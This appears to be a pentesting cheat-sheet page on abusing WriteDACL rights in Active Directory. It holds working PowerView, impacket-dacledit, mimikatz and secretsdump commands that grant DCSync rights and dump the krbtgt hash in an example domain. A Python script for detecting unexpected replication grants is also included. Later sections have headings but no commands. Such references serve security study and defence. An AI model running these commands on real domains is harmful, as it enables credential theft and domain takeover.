WriteDACL

With WriteDACL rights over an object, we can modify its DACL and grant ourselves any permission we want on that object.

Over a Domain

This can be leveraged to perform a DCSync attack.

Windows

# PowerView
Add-DomainObjectAcl -TargetIdentity $(Get-DomainSID) -PrincipalIdentity x7331 -Rights DCSync

# DCSync
mimikatz.exe "lsadump::dcsync /domain:marvel.local /user:krbtgt /csv"

Linux

# Granting DCSync rights over the domain object to x7331
impacket-dacledit -action write -rights DCSync -principal x7331 -target-dn dc=marvel,dc=local -dc-ip 10.10.10.5 marvel.local/x7331:'Passw0rd123!'

# DCSync
secretsdump.py -just-dc-user krbtgt marvel.local/x7331:'Passw0rd123!'@10.10.10.5
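
Detection side of the DCSync grant above, as an added example that is not part of the original page: a Python check that parses the domain object's security descriptor in SDDL form (for instance the nTSecurityDescriptor value logged in Security event 5136) and reports allow ACEs that give replication rights to trustees outside a baseline. The allowlist, the sample SDDL and the SID are constructed assumptions.

```python
import re

# Extended-right GUIDs whose grant on the domain object enables replication (DCSync).
REPL_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
# Assumed allowlist (SDDL aliases): Administrators, Domain/Enterprise Admins,
# Enterprise DCs, SYSTEM, read-only DCs. Tune to your own baseline.
EXPECTED = {"BA", "DA", "EA", "ED", "SY", "RO"}
CONTROL_ACCESS, GENERIC_ALL = 0x100, 0x10000000

def grants_control_access(rights):
    """True if the SDDL rights field includes CR (extended rights) or GA."""
    if rights.lower().startswith("0x"):
        return bool(int(rights, 16) & (CONTROL_ACCESS | GENERIC_ALL))
    return bool({rights[i:i + 2] for i in range(0, len(rights), 2)} & {"CR", "GA"})

def find_replication_grants(sddl, expected=EXPECTED):
    """Return (trustee, right) for allow ACEs giving replication rights to unexpected trustees."""
    dacl = re.search(r"D:[A-Z]*((?:\([^()]*\))+)", sddl)  # DACL only, stops before S:
    findings = []
    for body in re.findall(r"\(([^()]*)\)", dacl.group(1) if dacl else ""):
        fields = body.split(";")
        if len(fields) < 6 or fields[0] not in ("A", "OA") or fields[5] in expected:
            continue
        rights, guid, trustee = fields[2], fields[3].lower(), fields[5]
        if not grants_control_access(rights):
            continue
        if guid in REPL_RIGHTS:
            findings.append((trustee, REPL_RIGHTS[guid]))
        elif not guid:  # no object GUID: the ACE covers every extended right
            findings.append((trustee, "all extended rights"))
    return findings

# Constructed sample: SDDL of a domain object with two ACEs added for a regular user.
SID = "S-1-5-21-1111111111-2222222222-3333333333-1105"  # constructed SID
SAMPLE = (
    "O:BAG:BAD:AI"
    "(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)"
    "(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)"
    f"(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;{SID})"
    f"(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;{SID})"
    "(A;;RPLCLORC;;;AU)"
    "S:AI(AU;SA;WP;;;WD)"
)

if __name__ == "__main__":
    for trustee, right in find_replication_grants(SAMPLE):
        print(f"unexpected replication grant: {trustee} -> {right}")
```

A trustee reported with both Get-Changes and Get-Changes-All, or with all extended rights, can replicate secrets from the domain and should be checked against change records.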

Over a User

Grant yourself FullControl of the user.

Windows

Linux

Over a Group

This can be leveraged to add members to the group.

Windows

Linux

Over a Host

Grants FullControl of the computer. This can be leveraged to read the LAPS password or perform RBCD against the target host.

Windows

Over a GPO

Grants FullControl of the GPO. This can be leveraged to edit the GPO and take over an object the GPO applies to.

Windows

Over an OU

Grants FullControl of the OU. This can be leveraged to add a new ACE to the OU that inherits down to child objects so we can then take over those child objects.

Windows
